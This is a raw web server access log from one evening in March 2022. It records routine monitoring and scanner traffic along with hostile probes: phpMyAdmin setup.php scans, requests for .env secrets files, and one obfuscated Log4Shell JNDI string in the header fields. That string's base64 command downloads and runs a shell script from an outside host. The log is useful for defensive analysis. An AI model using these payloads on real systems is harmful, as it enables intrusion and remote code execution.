209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.89:80/phpMyAdmin-2.11.1-rc1/scripts/setup.php HTTP/1.0" 404 344 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.83:80/phpMyAdmin-2.10.1/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.85:80/phpMyAdmin-2.10.1/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.88:80/phpMyAdmin-2.10.1/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.89:80/phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.84:80/phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.10.1/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.85:80/phpMyAdmin-2.11.10.1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.83:80/phpMyAdmin-2.11.10.1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.88:80/phpMyAdmin-2.11.10.1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.89:80/phpMyAdmin-2.10.1/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.10.1/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.84:80/phpMyAdmin-2.10.1/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.10.1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.89:80/phpMyAdmin-2.11.10.1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.10.1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:15 +0100] "GET http://212.91.246.84:80/phpMyAdmin-2.11.10.1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
212.91.246.72 - - [03/Mar/2022:18:40:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [03/Mar/2022:18:41:22 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [03/Mar/2022:18:41:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:42:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:43:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:44:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.46 - - [03/Mar/2022:18:45:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.46 - - [03/Mar/2022:18:45:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.46 - - [03/Mar/2022:18:45:09 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [03/Mar/2022:18:45:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:46:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:47:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:48:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:49:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.237.103.123 - - [03/Mar/2022:18:49:57 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2022:18:50:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:51:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:52:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:53:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:54:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:55:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [03/Mar/2022:18:56:10 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [03/Mar/2022:18:56:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:57:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:58:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.192.241.99 - - [03/Mar/2022:18:58:55 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [03/Mar/2022:18:59:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [03/Mar/2022:19:00:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Mar/2022:19:00:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [03/Mar/2022:19:00:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [03/Mar/2022:19:01:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Mar/2022:19:01:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [03/Mar/2022:19:02:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [03/Mar/2022:19:02:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Mar/2022:19:02:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [03/Mar/2022:19:02:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [03/Mar/2022:19:03:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [03/Mar/2022:19:03:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Mar/2022:19:03:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [03/Mar/2022:19:03:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [03/Mar/2022:19:03:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Mar/2022:19:04:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.134.134 - - [03/Mar/2022:19:05:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Mar/2022:19:05:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
24.134.112.201 - - [03/Mar/2022:19:06:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
92.118.160.37 - - [03/Mar/2022:19:06:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
212.91.246.72 - - [03/Mar/2022:19:06:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:07:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:08:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:09:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:10:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:11:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:12:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:13:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:14:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:15:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:16:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:17:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:18:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:19:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:20:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:21:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:22:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:23:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:24:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:25:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [03/Mar/2022:19:26:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Mar/2022:19:26:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [03/Mar/2022:19:26:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.46 - - [03/Mar/2022:19:27:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.46 - - [03/Mar/2022:19:27:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.46 - - [03/Mar/2022:19:27:13 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [03/Mar/2022:19:27:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:28:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:29:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:30:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.246.165.170 - - [03/Mar/2022:19:31:04 +0100] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:59.0) Gecko/20100101 Firefox/59.0"
64.246.165.170 - - [03/Mar/2022:19:31:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:59.0) Gecko/20100101 Firefox/59.0"
212.91.246.72 - - [03/Mar/2022:19:31:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.61.40 - - [03/Mar/2022:19:31:49 +0100] "GET http://212.91.246.81:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:49 +0100] "GET http://212.91.246.81:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:50 +0100] "GET http://212.91.246.81:80/ysqladmin/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:50 +0100] "GET http://212.91.246.81:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:51 +0100] "GET http://212.91.246.81:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:51 +0100] "GET http://212.91.246.81:80/phpMyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:52 +0100] "GET http://212.91.246.81:80/sqladmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:52 +0100] "GET http://212.91.246.81:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:53 +0100] "GET http://212.91.246.81:80/phpadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:54 +0100] "GET http://212.91.246.81:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:54 +0100] "GET http://212.91.246.81:80/phpmy/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:54 +0100] "GET http://212.91.246.81:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:55 +0100] "GET http://212.91.246.81:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:55 +0100] "GET http://212.91.246.81:80/sql/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:56 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:56 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:57 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:58 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.1-rc1/scripts/setup.php HTTP/1.0" 404 344 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:58 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:59 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.10.1/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.40 - - [03/Mar/2022:19:31:59 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.10.1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
212.91.246.72 - - [03/Mar/2022:19:32:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:33:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:34:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:35:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:36:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:37:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:38:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.168.83.223 - - [03/Mar/2022:19:39:38 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.168.83.223 - - [03/Mar/2022:19:39:39 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2022:19:39:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:40:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:41:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:42:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:43:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.114.157 - - [03/Mar/2022:19:43:54 +0100] "GET / HTTP/1.1" 200 1229 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//205.185.114.157:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNDguMjI0LjI3L3dnZXQuc2g7IGNobW9kICt4IHdnZXQuc2g7IC4vd2dldC5zaDsgcm0gLXJmIHdnZXQuc2g=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//205.185.114.157:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNDguMjI0LjI3L3dnZXQuc2g7IGNobW9kICt4IHdnZXQuc2g7IC4vd2dldC5zaDsgcm0gLXJmIHdnZXQuc2g=}')"
45.137.23.152 - - [03/Mar/2022:19:44:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Mar/2022:19:44:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:45:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.237.103.9 - - [03/Mar/2022:19:46:10 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
89.239.110.161 - - [03/Mar/2022:19:46:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Mar/2022:19:46:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:47:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:48:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:49:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:50:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.226.3 - - [03/Mar/2022:19:51:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [03/Mar/2022:19:51:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [03/Mar/2022:19:51:43 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
128.1.248.26 - - [03/Mar/2022:19:52:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Mar/2022:19:52:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:53:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:54:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [03/Mar/2022:19:54:53 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
185.180.143.14 - - [03/Mar/2022:19:55:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
212.91.246.72 - - [03/Mar/2022:19:55:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:56:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:57:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.134.144.129 - - [03/Mar/2022:19:58:29 +0100] "\x16\x03\x03" 501 318 "-" "-"
